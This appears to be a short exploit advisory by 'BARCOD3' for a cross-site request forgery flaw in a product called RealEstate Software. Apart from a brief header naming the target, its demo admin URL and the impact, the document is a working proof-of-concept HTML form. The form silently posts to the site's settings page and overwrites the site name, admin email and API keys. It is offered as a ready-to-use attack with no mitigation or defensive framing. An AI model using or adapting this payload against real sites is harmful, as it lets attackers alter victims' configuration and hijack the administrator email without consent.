< ------------------- header data start ------------------- >

#############################################################

# Application Name : RealEstate Software
# Demo : http://demo.realestateportalsoftware.com/admin/
# Vulnerable Type : XSRF
# Infection : site informations can change
# Author : BARCOD3

#############################################################

< ------------------- header data end of ------------------- >

<h1>BARCOD3</h>
<form method=POST action=[target.com]/settings>
<input type=hidden name=site_name value=STEALTHISEVIL size=50>
<input type=hidden name=admin_email value=EVIL size=50>
<input type=hidden name=education_key value=EVIL size=50>
<input type=hidden name=zillow_key value=EVIL size=50>
<input type=hidden name=seo_desc value=STEAL size=50>
<input type=submit name=update_settings value=update>
</form>


< -- bug code end of -- >